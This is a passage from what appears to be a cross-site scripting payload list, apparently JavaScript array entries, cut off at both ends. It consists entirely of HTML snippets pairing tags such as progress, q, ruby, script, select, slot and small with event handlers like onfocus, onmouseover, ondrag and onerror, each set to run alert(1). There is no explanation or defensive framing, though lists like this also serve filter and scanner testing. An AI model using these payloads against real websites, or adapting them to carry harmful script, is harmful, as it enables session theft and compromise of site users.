onbeforedeactivate=alert(1)></progress><input autofocus>' +xss,'<progress id=x tabindex=1 ondeactivate=alert(1)></progress><input id=y autofocus>' +xss,'<progress id=x tabindex=1 onfocus=alert(1)></progress>' +xss,'<progress id=x tabindex=1 onfocusin=alert(1)></progress>' +xss,'<progress onbeforecopy="alert(1)" contenteditable>test</progress>' +xss,'<progress onbeforecut="alert(1)" contenteditable>test</progress>' +xss,'<progress onbeforepaste="alert(1)" contenteditable>test</progress>' +xss,'<progress onblur=alert(1) tabindex=1 id=x></progress><input autofocus>' +xss,'<progress onclick="alert(1)">test</progress>' +xss,'<progress oncontextmenu="alert(1)">test</progress>' +xss,'<progress oncopy="alert(1)" contenteditable>test</progress>' +xss,'<progress oncut="alert(1)" contenteditable>test</progress>' +xss,'<progress ondblclick="alert(1)">test</progress>' +xss,'<progress onfocusout=alert(1) tabindex=1 id=x></progress><input autofocus>' +xss,'<progress onkeydown="alert(1)" contenteditable>test</progress>' +xss,'<progress onkeypress="alert(1)" contenteditable>test</progress>' +xss,'<progress onkeyup="alert(1)" contenteditable>test</progress>' +xss,'<progress onmousedown="alert(1)">test</progress>' +xss,'<progress onmouseenter="alert(1)">test</progress>' +xss,'<progress onmouseleave="alert(1)">test</progress>' +xss,'<progress onmousemove="alert(1)">test</progress>' +xss,'<progress onmouseout="alert(1)">test</progress>' +xss,'<progress onmouseover="alert(1)">test</progress>' +xss,'<progress onmouseup="alert(1)">test</progress>' +xss,'<progress onpaste="alert(1)" contenteditable>test</progress>' +xss,'<q draggable="true" ondrag="alert(1)">test</q>' +xss,'<q draggable="true" ondragend="alert(1)">test</q>' +xss,'<q draggable="true" ondragenter="alert(1)">test</q>' +xss,'<q draggable="true" ondragleave="alert(1)">test</q>' +xss,'<q draggable="true" ondragstart="alert(1)">test</q>' +xss,'<q id=x tabindex=1 onactivate=alert(1)></q>' +xss,'<q id=x tabindex=1 onbeforeactivate=alert(1)></q>' +xss,'<q id=x tabindex=1 onbeforedeactivate=alert(1)></q><input autofocus>' +xss,'<q id=x tabindex=1 ondeactivate=alert(1)></q><input id=y autofocus>' +xss,'<q id=x tabindex=1 onfocus=alert(1)></q>' +xss,'<q id=x tabindex=1 onfocusin=alert(1)></q>' +xss,'<q onbeforecopy="alert(1)" contenteditable>test</q>' +xss,'<q onbeforecut="alert(1)" contenteditable>test</q>' +xss,'<q onbeforepaste="alert(1)" contenteditable>test</q>' +xss,'<q onblur=alert(1) tabindex=1 id=x></q><input autofocus>' +xss,'<q onclick="alert(1)">test</q>' +xss,'<q oncontextmenu="alert(1)">test</q>' +xss,'<q oncopy="alert(1)" contenteditable>test</q>' +xss,'<q oncut="alert(1)" contenteditable>test</q>' +xss,'<q ondblclick="alert(1)">test</q>' +xss,'<q onfocusout=alert(1) tabindex=1 id=x></q><input autofocus>' +xss,'<q onkeydown="alert(1)" contenteditable>test</q>' +xss,'<q onkeypress="alert(1)" contenteditable>test</q>' +xss,'<q onkeyup="alert(1)" contenteditable>test</q>' +xss,'<q onmousedown="alert(1)">test</q>' +xss,'<q onmouseenter="alert(1)">test</q>' +xss,'<q onmouseleave="alert(1)">test</q>' +xss,'<q onmousemove="alert(1)">test</q>' +xss,'<q onmouseout="alert(1)">test</q>' +xss,'<q onmouseover="alert(1)">test</q>' +xss,'<q onmouseup="alert(1)">test</q>' +xss,'<q onpaste="alert(1)" contenteditable>test</q>' +xss,'<rb draggable="true" ondrag="alert(1)">test</rb>' +xss,'<rb draggable="true" ondragend="alert(1)">test</rb>' +xss,'<rb draggable="true" ondragenter="alert(1)">test</rb>' +xss,'<rb draggable="true" ondragleave="alert(1)">test</rb>' +xss,'<rb draggable="true" ondragstart="alert(1)">test</rb>' +xss,'<rb id=x tabindex=1 onactivate=alert(1)></rb>' +xss,'<rb id=x tabindex=1 onbeforeactivate=alert(1)></rb>' +xss,'<rb id=x tabindex=1 onbeforedeactivate=alert(1)></rb><input autofocus>' +xss,'<rb id=x tabindex=1 ondeactivate=alert(1)></rb><input id=y autofocus>' +xss,'<rb id=x tabindex=1 onfocus=alert(1)></rb>' +xss,'<rb id=x tabindex=1 onfocusin=alert(1)></rb>' +xss,'<rb onbeforecopy="alert(1)" contenteditable>test</rb>' +xss,'<rb onbeforecut="alert(1)" contenteditable>test</rb>' +xss,'<rb onbeforepaste="alert(1)" contenteditable>test</rb>' +xss,'<rb onblur=alert(1) tabindex=1 id=x></rb><input autofocus>' +xss,'<rb onclick="alert(1)">test</rb>' +xss,'<rb oncontextmenu="alert(1)">test</rb>' +xss,'<rb oncopy="alert(1)" contenteditable>test</rb>' +xss,'<rb oncut="alert(1)" contenteditable>test</rb>' +xss,'<rb ondblclick="alert(1)">test</rb>' +xss,'<rb onfocusout=alert(1) tabindex=1 id=x></rb><input autofocus>' +xss,'<rb onkeydown="alert(1)" contenteditable>test</rb>' +xss,'<rb onkeypress="alert(1)" contenteditable>test</rb>' +xss,'<rb onkeyup="alert(1)" contenteditable>test</rb>' +xss,'<rb onmousedown="alert(1)">test</rb>' +xss,'<rb onmouseenter="alert(1)">test</rb>' +xss,'<rb onmouseleave="alert(1)">test</rb>' +xss,'<rb onmousemove="alert(1)">test</rb>' +xss,'<rb onmouseout="alert(1)">test</rb>' +xss,'<rb onmouseover="alert(1)">test</rb>' +xss,'<rb onmouseup="alert(1)">test</rb>' +xss,'<rb onpaste="alert(1)" contenteditable>test</rb>' +xss,'<rp draggable="true" ondrag="alert(1)">test</rp>' +xss,'<rp draggable="true" ondragend="alert(1)">test</rp>' +xss,'<rp draggable="true" ondragenter="alert(1)">test</rp>' +xss,'<rp draggable="true" ondragleave="alert(1)">test</rp>' +xss,'<rp draggable="true" ondragstart="alert(1)">test</rp>' +xss,'<rp id=x tabindex=1 onactivate=alert(1)></rp>' +xss,'<rp id=x tabindex=1 onbeforeactivate=alert(1)></rp>' +xss,'<rp id=x tabindex=1 onbeforedeactivate=alert(1)></rp><input autofocus>' +xss,'<rp id=x tabindex=1 ondeactivate=alert(1)></rp><input id=y autofocus>' +xss,'<rp id=x tabindex=1 onfocus=alert(1)></rp>' +xss,'<rp id=x tabindex=1 onfocusin=alert(1)></rp>' +xss,'<rp onbeforecopy="alert(1)" contenteditable>test</rp>' +xss,'<rp onbeforecut="alert(1)" contenteditable>test</rp>' +xss,'<rp onbeforepaste="alert(1)" contenteditable>test</rp>' +xss,'<rp onblur=alert(1) tabindex=1 id=x></rp><input autofocus>' +xss,'<rp onclick="alert(1)">test</rp>' +xss,'<rp oncontextmenu="alert(1)">test</rp>' +xss,'<rp oncopy="alert(1)" contenteditable>test</rp>' +xss,'<rp oncut="alert(1)" contenteditable>test</rp>' +xss,'<rp ondblclick="alert(1)">test</rp>' +xss,'<rp onfocusout=alert(1) tabindex=1 id=x></rp><input autofocus>' +xss,'<rp onkeydown="alert(1)" contenteditable>test</rp>' +xss,'<rp onkeypress="alert(1)" contenteditable>test</rp>' +xss,'<rp onkeyup="alert(1)" contenteditable>test</rp>' +xss,'<rp onmousedown="alert(1)">test</rp>' +xss,'<rp onmouseenter="alert(1)">test</rp>' +xss,'<rp onmouseleave="alert(1)">test</rp>' +xss,'<rp onmousemove="alert(1)">test</rp>' +xss,'<rp onmouseout="alert(1)">test</rp>' +xss,'<rp onmouseover="alert(1)">test</rp>' +xss,'<rp onmouseup="alert(1)">test</rp>' +xss,'<rp onpaste="alert(1)" contenteditable>test</rp>' +xss,'<rt draggable="true" ondrag="alert(1)">test</rt>' +xss,'<rt draggable="true" ondragend="alert(1)">test</rt>' +xss,'<rt draggable="true" ondragenter="alert(1)">test</rt>' +xss,'<rt draggable="true" ondragleave="alert(1)">test</rt>' +xss,'<rt draggable="true" ondragstart="alert(1)">test</rt>' +xss,'<rt id=x tabindex=1 onactivate=alert(1)></rt>' +xss,'<rt id=x tabindex=1 onbeforeactivate=alert(1)></rt>' +xss,'<rt id=x tabindex=1 onbeforedeactivate=alert(1)></rt><input autofocus>' +xss,'<rt id=x tabindex=1 ondeactivate=alert(1)></rt><input id=y autofocus>' +xss,'<rt id=x tabindex=1 onfocus=alert(1)></rt>' +xss,'<rt id=x tabindex=1 onfocusin=alert(1)></rt>' +xss,'<rt onbeforecopy="alert(1)" contenteditable>test</rt>' +xss,'<rt onbeforecut="alert(1)" contenteditable>test</rt>' +xss,'<rt onbeforepaste="alert(1)" contenteditable>test</rt>' +xss,'<rt onblur=alert(1) tabindex=1 id=x></rt><input autofocus>' +xss,'<rt onclick="alert(1)">test</rt>' +xss,'<rt oncontextmenu="alert(1)">test</rt>' +xss,'<rt oncopy="alert(1)" contenteditable>test</rt>' +xss,'<rt oncut="alert(1)" contenteditable>test</rt>' +xss,'<rt ondblclick="alert(1)">test</rt>' +xss,'<rt onfocusout=alert(1) tabindex=1 id=x></rt><input autofocus>' +xss,'<rt onkeydown="alert(1)" contenteditable>test</rt>' +xss,'<rt onkeypress="alert(1)" contenteditable>test</rt>' +xss,'<rt onkeyup="alert(1)" contenteditable>test</rt>' +xss,'<rt onmousedown="alert(1)">test</rt>' +xss,'<rt onmouseenter="alert(1)">test</rt>' +xss,'<rt onmouseleave="alert(1)">test</rt>' +xss,'<rt onmousemove="alert(1)">test</rt>' +xss,'<rt onmouseout="alert(1)">test</rt>' +xss,'<rt onmouseover="alert(1)">test</rt>' +xss,'<rt onmouseup="alert(1)">test</rt>' +xss,'<rt onpaste="alert(1)" contenteditable>test</rt>' +xss,'<rtc draggable="true" ondrag="alert(1)">test</rtc>' +xss,'<rtc draggable="true" ondragend="alert(1)">test</rtc>' +xss,'<rtc draggable="true" ondragenter="alert(1)">test</rtc>' +xss,'<rtc draggable="true" ondragleave="alert(1)">test</rtc>' +xss,'<rtc draggable="true" ondragstart="alert(1)">test</rtc>' +xss,'<rtc id=x tabindex=1 onactivate=alert(1)></rtc>' +xss,'<rtc id=x tabindex=1 onbeforeactivate=alert(1)></rtc>' +xss,'<rtc id=x tabindex=1 onbeforedeactivate=alert(1)></rtc><input autofocus>' +xss,'<rtc id=x tabindex=1 ondeactivate=alert(1)></rtc><input id=y autofocus>' +xss,'<rtc id=x tabindex=1 onfocus=alert(1)></rtc>' +xss,'<rtc id=x tabindex=1 onfocusin=alert(1)></rtc>' +xss,'<rtc onbeforecopy="alert(1)" contenteditable>test</rtc>' +xss,'<rtc onbeforecut="alert(1)" contenteditable>test</rtc>' +xss,'<rtc onbeforepaste="alert(1)" contenteditable>test</rtc>' +xss,'<rtc onblur=alert(1) tabindex=1 id=x></rtc><input autofocus>' +xss,'<rtc onclick="alert(1)">test</rtc>' +xss,'<rtc oncontextmenu="alert(1)">test</rtc>' +xss,'<rtc oncopy="alert(1)" contenteditable>test</rtc>' +xss,'<rtc oncut="alert(1)" contenteditable>test</rtc>' +xss,'<rtc ondblclick="alert(1)">test</rtc>' +xss,'<rtc onfocusout=alert(1) tabindex=1 id=x></rtc><input autofocus>' +xss,'<rtc onkeydown="alert(1)" contenteditable>test</rtc>' +xss,'<rtc onkeypress="alert(1)" contenteditable>test</rtc>' +xss,'<rtc onkeyup="alert(1)" contenteditable>test</rtc>' +xss,'<rtc onmousedown="alert(1)">test</rtc>' +xss,'<rtc onmouseenter="alert(1)">test</rtc>' +xss,'<rtc onmouseleave="alert(1)">test</rtc>' +xss,'<rtc onmousemove="alert(1)">test</rtc>' +xss,'<rtc onmouseout="alert(1)">test</rtc>' +xss,'<rtc onmouseover="alert(1)">test</rtc>' +xss,'<rtc onmouseup="alert(1)">test</rtc>' +xss,'<rtc onpaste="alert(1)" contenteditable>test</rtc>' +xss,'<ruby draggable="true" ondrag="alert(1)">test</ruby>' +xss,'<ruby draggable="true" ondragend="alert(1)">test</ruby>' +xss,'<ruby draggable="true" ondragenter="alert(1)">test</ruby>' +xss,'<ruby draggable="true" ondragleave="alert(1)">test</ruby>' +xss,'<ruby draggable="true" ondragstart="alert(1)">test</ruby>' +xss,'<ruby id=x tabindex=1 onactivate=alert(1)></ruby>' +xss,'<ruby id=x tabindex=1 onbeforeactivate=alert(1)></ruby>' +xss,'<ruby id=x tabindex=1 onbeforedeactivate=alert(1)></ruby><input autofocus>' +xss,'<ruby id=x tabindex=1 ondeactivate=alert(1)></ruby><input id=y autofocus>' +xss,'<ruby id=x tabindex=1 onfocus=alert(1)></ruby>' +xss,'<ruby id=x tabindex=1 onfocusin=alert(1)></ruby>' +xss,'<ruby onbeforecopy="alert(1)" contenteditable>test</ruby>' +xss,'<ruby onbeforecut="alert(1)" contenteditable>test</ruby>' +xss,'<ruby onbeforepaste="alert(1)" contenteditable>test</ruby>' +xss,'<ruby onblur=alert(1) tabindex=1 id=x></ruby><input autofocus>' +xss,'<ruby onclick="alert(1)">test</ruby>' +xss,'<ruby oncontextmenu="alert(1)">test</ruby>' +xss,'<ruby oncopy="alert(1)" contenteditable>test</ruby>' +xss,'<ruby oncut="alert(1)" contenteditable>test</ruby>' +xss,'<ruby ondblclick="alert(1)">test</ruby>' +xss,'<ruby onfocusout=alert(1) tabindex=1 id=x></ruby><input autofocus>' +xss,'<ruby onkeydown="alert(1)" contenteditable>test</ruby>' +xss,'<ruby onkeypress="alert(1)" contenteditable>test</ruby>' +xss,'<ruby onkeyup="alert(1)" contenteditable>test</ruby>' +xss,'<ruby onmousedown="alert(1)">test</ruby>' +xss,'<ruby onmouseenter="alert(1)">test</ruby>' +xss,'<ruby onmouseleave="alert(1)">test</ruby>' +xss,'<ruby onmousemove="alert(1)">test</ruby>' +xss,'<ruby onmouseout="alert(1)">test</ruby>' +xss,'<ruby onmouseover="alert(1)">test</ruby>' +xss,'<ruby onmouseup="alert(1)">test</ruby>' +xss,'<ruby onpaste="alert(1)" contenteditable>test</ruby>' +xss,'<s draggable="true" ondrag="alert(1)">test</s>' +xss,'<s draggable="true" ondragend="alert(1)">test</s>' +xss,'<s draggable="true" ondragenter="alert(1)">test</s>' +xss,'<s draggable="true" ondragleave="alert(1)">test</s>' +xss,'<s draggable="true" ondragstart="alert(1)">test</s>' +xss,'<s id=x tabindex=1 onactivate=alert(1)></s>' +xss,'<s id=x tabindex=1 onbeforeactivate=alert(1)></s>' +xss,'<s id=x tabindex=1 onbeforedeactivate=alert(1)></s><input autofocus>' +xss,'<s id=x tabindex=1 ondeactivate=alert(1)></s><input id=y autofocus>' +xss,'<s id=x tabindex=1 onfocus=alert(1)></s>' +xss,'<s id=x tabindex=1 onfocusin=alert(1)></s>' +xss,'<s onbeforecopy="alert(1)" contenteditable>test</s>' +xss,'<s onbeforecut="alert(1)" contenteditable>test</s>' +xss,'<s onbeforepaste="alert(1)" contenteditable>test</s>' +xss,'<s onblur=alert(1) tabindex=1 id=x></s><input autofocus>' +xss,'<s onclick="alert(1)">test</s>' +xss,'<s oncontextmenu="alert(1)">test</s>' +xss,'<s oncopy="alert(1)" contenteditable>test</s>' +xss,'<s oncut="alert(1)" contenteditable>test</s>' +xss,'<s ondblclick="alert(1)">test</s>' +xss,'<s onfocusout=alert(1) tabindex=1 id=x></s><input autofocus>' +xss,'<s onkeydown="alert(1)" contenteditable>test</s>' +xss,'<s onkeypress="alert(1)" contenteditable>test</s>' +xss,'<s onkeyup="alert(1)" contenteditable>test</s>' +xss,'<s onmousedown="alert(1)">test</s>' +xss,'<s onmouseenter="alert(1)">test</s>' +xss,'<s onmouseleave="alert(1)">test</s>' +xss,'<s onmousemove="alert(1)">test</s>' +xss,'<s onmouseout="alert(1)">test</s>' +xss,'<s onmouseover="alert(1)">test</s>' +xss,'<s onmouseup="alert(1)">test</s>' +xss,'<s onpaste="alert(1)" contenteditable>test</s>' +xss,'<samp draggable="true" ondrag="alert(1)">test</samp>' +xss,'<samp draggable="true" ondragend="alert(1)">test</samp>' +xss,'<samp draggable="true" ondragenter="alert(1)">test</samp>' +xss,'<samp draggable="true" ondragleave="alert(1)">test</samp>' +xss,'<samp draggable="true" ondragstart="alert(1)">test</samp>' +xss,'<samp id=x tabindex=1 onactivate=alert(1)></samp>' +xss,'<samp id=x tabindex=1 onbeforeactivate=alert(1)></samp>' +xss,'<samp id=x tabindex=1 onbeforedeactivate=alert(1)></samp><input autofocus>' +xss,'<samp id=x tabindex=1 ondeactivate=alert(1)></samp><input id=y autofocus>' +xss,'<samp id=x tabindex=1 onfocus=alert(1)></samp>' +xss,'<samp id=x tabindex=1 onfocusin=alert(1)></samp>' +xss,'<samp onbeforecopy="alert(1)" contenteditable>test</samp>' +xss,'<samp onbeforecut="alert(1)" contenteditable>test</samp>' +xss,'<samp onbeforepaste="alert(1)" contenteditable>test</samp>' +xss,'<samp onblur=alert(1) tabindex=1 id=x></samp><input autofocus>' +xss,'<samp onclick="alert(1)">test</samp>' +xss,'<samp oncontextmenu="alert(1)">test</samp>' +xss,'<samp oncopy="alert(1)" contenteditable>test</samp>' +xss,'<samp oncut="alert(1)" contenteditable>test</samp>' +xss,'<samp ondblclick="alert(1)">test</samp>' +xss,'<samp onfocusout=alert(1) tabindex=1 id=x></samp><input autofocus>' +xss,'<samp onkeydown="alert(1)" contenteditable>test</samp>' +xss,'<samp onkeypress="alert(1)" contenteditable>test</samp>' +xss,'<samp onkeyup="alert(1)" contenteditable>test</samp>' +xss,'<samp onmousedown="alert(1)">test</samp>' +xss,'<samp onmouseenter="alert(1)">test</samp>' +xss,'<samp onmouseleave="alert(1)">test</samp>' +xss,'<samp onmousemove="alert(1)">test</samp>' +xss,'<samp onmouseout="alert(1)">test</samp>' +xss,'<samp onmouseover="alert(1)">test</samp>' +xss,'<samp onmouseup="alert(1)">test</samp>' +xss,'<samp onpaste="alert(1)" contenteditable>test</samp>' +xss,'<script draggable="true" ondrag="alert(1)">test</script>' +xss,'<script draggable="true" ondragend="alert(1)">test</script>' +xss,'<script draggable="true" ondragenter="alert(1)">test</script>' +xss,'<script draggable="true" ondragleave="alert(1)">test</script>' +xss,'<script draggable="true" ondragstart="alert(1)">test</script>' +xss,'<script id=x tabindex=1 onactivate=alert(1)></script>' +xss,'<script id=x tabindex=1 onbeforeactivate=alert(1)></script>' +xss,'<script id=x tabindex=1 onbeforedeactivate=alert(1)></script><input autofocus>' +xss,'<script id=x tabindex=1 ondeactivate=alert(1)></script><input id=y autofocus>' +xss,'<script id=x tabindex=1 onfocus=alert(1)></script>' +xss,'<script id=x tabindex=1 onfocusin=alert(1)></script>' +xss,'<script onbeforecopy="alert(1)" contenteditable>test</script>' +xss,'<script onbeforecut="alert(1)" contenteditable>test</script>' +xss,'<script onbeforepaste="alert(1)" contenteditable>test</script>' +xss,'<script onblur=alert(1) tabindex=1 id=x></script><input autofocus>' +xss,'<script onclick="alert(1)">test</script>' +xss,'<script oncontextmenu="alert(1)">test</script>' +xss,'<script oncopy="alert(1)" contenteditable>test</script>' +xss,'<script oncut="alert(1)" contenteditable>test</script>' +xss,'<script ondblclick="alert(1)">test</script>' +xss,'<script onerror=alert(1) src=/></script>' +xss,'<script onfocusout=alert(1) tabindex=1 id=x></script><input autofocus>' +xss,'<script onkeydown="alert(1)" contenteditable>test</script>' +xss,'<script onkeypress="alert(1)" contenteditable>test</script>' +xss,'<script onkeyup="alert(1)" contenteditable>test</script>' +xss,'<script onload=alert(1) src=validjs.js></script>' +xss,'<script onmousedown="alert(1)">test</script>' +xss,'<script onmouseenter="alert(1)">test</script>' +xss,'<script onmouseleave="alert(1)">test</script>' +xss,'<script onmousemove="alert(1)">test</script>' +xss,'<script onmouseout="alert(1)">test</script>' +xss,'<script onmouseover="alert(1)">test</script>' +xss,'<script onmouseup="alert(1)">test</script>' +xss,'<script onpaste="alert(1)" contenteditable>test</script>' +xss,'<script onreadystatechange=alert(1)></script>' +xss,'<section draggable="true" ondrag="alert(1)">test</section>' +xss,'<section draggable="true" ondragend="alert(1)">test</section>' +xss,'<section draggable="true" ondragenter="alert(1)">test</section>' +xss,'<section draggable="true" ondragleave="alert(1)">test</section>' +xss,'<section draggable="true" ondragstart="alert(1)">test</section>' +xss,'<section id=x tabindex=1 onactivate=alert(1)></section>' +xss,'<section id=x tabindex=1 onbeforeactivate=alert(1)></section>' +xss,'<section id=x tabindex=1 onbeforedeactivate=alert(1)></section><input autofocus>' +xss,'<section id=x tabindex=1 ondeactivate=alert(1)></section><input id=y autofocus>' +xss,'<section id=x tabindex=1 onfocus=alert(1)></section>' +xss,'<section id=x tabindex=1 onfocusin=alert(1)></section>' +xss,'<section onbeforecopy="alert(1)" contenteditable>test</section>' +xss,'<section onbeforecut="alert(1)" contenteditable>test</section>' +xss,'<section onbeforepaste="alert(1)" contenteditable>test</section>' +xss,'<section onblur=alert(1) tabindex=1 id=x></section><input autofocus>' +xss,'<section onclick="alert(1)">test</section>' +xss,'<section oncontextmenu="alert(1)">test</section>' +xss,'<section oncopy="alert(1)" contenteditable>test</section>' +xss,'<section oncut="alert(1)" contenteditable>test</section>' +xss,'<section ondblclick="alert(1)">test</section>' +xss,'<section onfocusout=alert(1) tabindex=1 id=x></section><input autofocus>' +xss,'<section onkeydown="alert(1)" contenteditable>test</section>' +xss,'<section onkeypress="alert(1)" contenteditable>test</section>' +xss,'<section onkeyup="alert(1)" contenteditable>test</section>' +xss,'<section onmousedown="alert(1)">test</section>' +xss,'<section onmouseenter="alert(1)">test</section>' +xss,'<section onmouseleave="alert(1)">test</section>' +xss,'<section onmousemove="alert(1)">test</section>' +xss,'<section onmouseout="alert(1)">test</section>' +xss,'<section onmouseover="alert(1)">test</section>' +xss,'<section onmouseup="alert(1)">test</section>' +xss,'<section onpaste="alert(1)" contenteditable>test</section>' +xss,'<select autofocus onfocus=alert(1)>' +xss,'<select autofocus onfocusin=alert(1)>' +xss,'<select draggable="true" ondrag="alert(1)">test</select>' +xss,'<select draggable="true" ondragend="alert(1)">test</select>' +xss,'<select draggable="true" ondragenter="alert(1)">test</select>' +xss,'<select draggable="true" ondragleave="alert(1)">test</select>' +xss,'<select draggable="true" ondragstart="alert(1)">test</select>' +xss,'<select id=x tabindex=1 onactivate=alert(1)></select>' +xss,'<select id=x tabindex=1 onbeforeactivate=alert(1)></select>' +xss,'<select id=x tabindex=1 onbeforedeactivate=alert(1)></select><input autofocus>' +xss,'<select id=x tabindex=1 ondeactivate=alert(1)></select><input id=y autofocus>' +xss,'<select onbeforecopy="alert(1)" contenteditable>test</select>' +xss,'<select onbeforecut="alert(1)" contenteditable>test</select>' +xss,'<select onbeforepaste="alert(1)" contenteditable>test</select>' +xss,'<select onblur=alert(1) id=x></select><input autofocus>' +xss,'<select onchange=alert(1)><option>change me</option><option>XSS</option></select>' +xss,'<select onclick="alert(1)">test</select>' +xss,'<select oncontextmenu="alert(1)">test</select>' +xss,'<select oncopy="alert(1)" contenteditable>test</select>' +xss,'<select oncut="alert(1)" contenteditable>test</select>' +xss,'<select ondblclick="alert(1)">test</select>' +xss,'<select onfocusout=alert(1) id=x></select><input autofocus>' +xss,'<select onkeydown="alert(1)" contenteditable>test</select>' +xss,'<select onkeypress="alert(1)" contenteditable>test</select>' +xss,'<select onkeyup="alert(1)" contenteditable>test</select>' +xss,'<select onmousedown="alert(1)">test</select>' +xss,'<select onmouseenter="alert(1)">test</select>' +xss,'<select onmouseleave="alert(1)">test</select>' +xss,'<select onmousemove="alert(1)">test</select>' +xss,'<select onmouseout="alert(1)">test</select>' +xss,'<select onmouseover="alert(1)">test</select>' +xss,'<select onmouseup="alert(1)">test</select>' +xss,'<select onpaste="alert(1)" contenteditable>test</select>' +xss,'<shadow draggable="true" ondrag="alert(1)">test</shadow>' +xss,'<shadow draggable="true" ondragend="alert(1)">test</shadow>' +xss,'<shadow draggable="true" ondragenter="alert(1)">test</shadow>' +xss,'<shadow draggable="true" ondragleave="alert(1)">test</shadow>' +xss,'<shadow draggable="true" ondragstart="alert(1)">test</shadow>' +xss,'<shadow id=x tabindex=1 onactivate=alert(1)></shadow>' +xss,'<shadow id=x tabindex=1 onbeforeactivate=alert(1)></shadow>' +xss,'<shadow id=x tabindex=1 onbeforedeactivate=alert(1)></shadow><input autofocus>' +xss,'<shadow id=x tabindex=1 ondeactivate=alert(1)></shadow><input id=y autofocus>' +xss,'<shadow id=x tabindex=1 onfocus=alert(1)></shadow>' +xss,'<shadow id=x tabindex=1 onfocusin=alert(1)></shadow>' +xss,'<shadow onbeforecopy="alert(1)" contenteditable>test</shadow>' +xss,'<shadow onbeforecut="alert(1)" contenteditable>test</shadow>' +xss,'<shadow onbeforepaste="alert(1)" contenteditable>test</shadow>' +xss,'<shadow onblur=alert(1) tabindex=1 id=x></shadow><input autofocus>' +xss,'<shadow onclick="alert(1)">test</shadow>' +xss,'<shadow oncontextmenu="alert(1)">test</shadow>' +xss,'<shadow oncopy="alert(1)" contenteditable>test</shadow>' +xss,'<shadow oncut="alert(1)" contenteditable>test</shadow>' +xss,'<shadow ondblclick="alert(1)">test</shadow>' +xss,'<shadow onfocusout=alert(1) tabindex=1 id=x></shadow><input autofocus>' +xss,'<shadow onkeydown="alert(1)" contenteditable>test</shadow>' +xss,'<shadow onkeypress="alert(1)" contenteditable>test</shadow>' +xss,'<shadow onkeyup="alert(1)" contenteditable>test</shadow>' +xss,'<shadow onmousedown="alert(1)">test</shadow>' +xss,'<shadow onmouseenter="alert(1)">test</shadow>' +xss,'<shadow onmouseleave="alert(1)">test</shadow>' +xss,'<shadow onmousemove="alert(1)">test</shadow>' +xss,'<shadow onmouseout="alert(1)">test</shadow>' +xss,'<shadow onmouseover="alert(1)">test</shadow>' +xss,'<shadow onmouseup="alert(1)">test</shadow>' +xss,'<shadow onpaste="alert(1)" contenteditable>test</shadow>' +xss,'<slot draggable="true" ondrag="alert(1)">test</slot>' +xss,'<slot draggable="true" ondragend="alert(1)">test</slot>' +xss,'<slot draggable="true" ondragenter="alert(1)">test</slot>' +xss,'<slot draggable="true" ondragleave="alert(1)">test</slot>' +xss,'<slot draggable="true" ondragstart="alert(1)">test</slot>' +xss,'<slot id=x tabindex=1 onactivate=alert(1)></slot>' +xss,'<slot id=x tabindex=1 onbeforeactivate=alert(1)></slot>' +xss,'<slot id=x tabindex=1 onbeforedeactivate=alert(1)></slot><input autofocus>' +xss,'<slot id=x tabindex=1 ondeactivate=alert(1)></slot><input id=y autofocus>' +xss,'<slot id=x tabindex=1 onfocus=alert(1)></slot>' +xss,'<slot id=x tabindex=1 onfocusin=alert(1)></slot>' +xss,'<slot onbeforecopy="alert(1)" contenteditable>test</slot>' +xss,'<slot onbeforecut="alert(1)" contenteditable>test</slot>' +xss,'<slot onbeforepaste="alert(1)" contenteditable>test</slot>' +xss,'<slot onblur=alert(1) tabindex=1 id=x></slot><input autofocus>' +xss,'<slot onclick="alert(1)">test</slot>' +xss,'<slot oncontextmenu="alert(1)">test</slot>' +xss,'<slot oncopy="alert(1)" contenteditable>test</slot>' +xss,'<slot oncut="alert(1)" contenteditable>test</slot>' +xss,'<slot ondblclick="alert(1)">test</slot>' +xss,'<slot onfocusout=alert(1) tabindex=1 id=x></slot><input autofocus>' +xss,'<slot onkeydown="alert(1)" contenteditable>test</slot>' +xss,'<slot onkeypress="alert(1)" contenteditable>test</slot>' +xss,'<slot onkeyup="alert(1)" contenteditable>test</slot>' +xss,'<slot onmousedown="alert(1)">test</slot>' +xss,'<slot onmouseenter="alert(1)">test</slot>' +xss,'<slot onmouseleave="alert(1)">test</slot>' +xss,'<slot onmousemove="alert(1)">test</slot>' +xss,'<slot onmouseout="alert(1)">test</slot>' +xss,'<slot onmouseover="alert(1)">test</slot>' +xss,'<slot onmouseup="alert(1)">test</slot>' +xss,'<slot onpaste="alert(1)" contenteditable>test</slot>' +xss,'<small draggable="true" ondrag="alert(1)">test</small>' +xss,'<small draggable="true" ondragend="alert(1)">test</small>' +xss,'<small draggable="true" ondragenter="alert(1)">test</small>' +xss,'<small draggable="true" ondragleave="alert(1)">test</small>' +xss,'<small draggable="true" ondragstart="alert(1)">test</small>' +xss,'<small id=x tabindex=1 onactivate=alert(1)></small>' +xss,'<small id=x tabindex=1 onbeforeactivate=alert(1)></small>' +xss,'<small id=x tabindex=1 onbeforedeactivate=alert(1)></small><input autofocus>' +xss,'<small id=x tabindex=1 ondeactivate=alert(1)></small><input id=y autofocus>' +xss,'<small id=x tabindex=1 onfocus=alert(1)></small>' +xss,'<small id=x tabindex=1 onfocusin=alert(1)></small>' +xss,'<small onbeforecopy="alert(1)" contenteditable>test</small>' +xss,'<small onbeforecut="alert(1)" contenteditable>test</small>' +xss,'<small onbeforepaste="alert(1)" contenteditable>test</small>' +xss,'<small onblur=alert(1) tabindex=1 id=x></small><input autofocus>' +xss,'<small onclick="alert(1)">test</small>' +xss,'<small oncontextmenu="alert(1)">test</small>' +xss,'<small oncopy="alert(1)" contenteditable>test</small>' +xss,'<small oncut="alert(1)" contenteditable>test</small>' +xss,'<small ondblclick="alert(1)">test</small>' +xss,'<small onfocusout=alert(1) tabindex=1 id=x></small><input autofocus>' +xss,'<small onkeydown="alert(1)" contenteditable>test</small>' +xss,'<small onkeypress="alert(1)" contenteditable>test</small>' +xss,'<small onkeyup="alert(1)" contenteditable>test</small>' +xss,'<small onmousedown="alert(1)">test</small>' +xss,'<small onmouseenter="alert(1)">test</small>' +xss,'<small onmouseleave="alert(1)">test</small>' +xss,'<small onmousemove="alert(1)">test</small>' +xss,'<small onmouseout="alert(1)">test</small>' +xss,'<small onmouseover="alert(1)">test</small>' +xss,'<small onmouseup="alert(1)">test</small>' +xss,'<small onpaste="alert(1)" contenteditable>test</small>' +xss,'<source draggable="true" ondrag="alert(1)">test</source>' +xss,'<source draggable="true" ondragend="alert(1)">test</source>' +xss,'<source draggable="true" ondragenter="alert(1)">test</source>' +xss,'<source draggable="true" ondragleave="alert(1)">test</source>' +xss,'<source draggable="true" ondragstart="alert(1)">test</source>' +xss,'<source id=x tabindex=1 onactivate=alert(1)></source>' 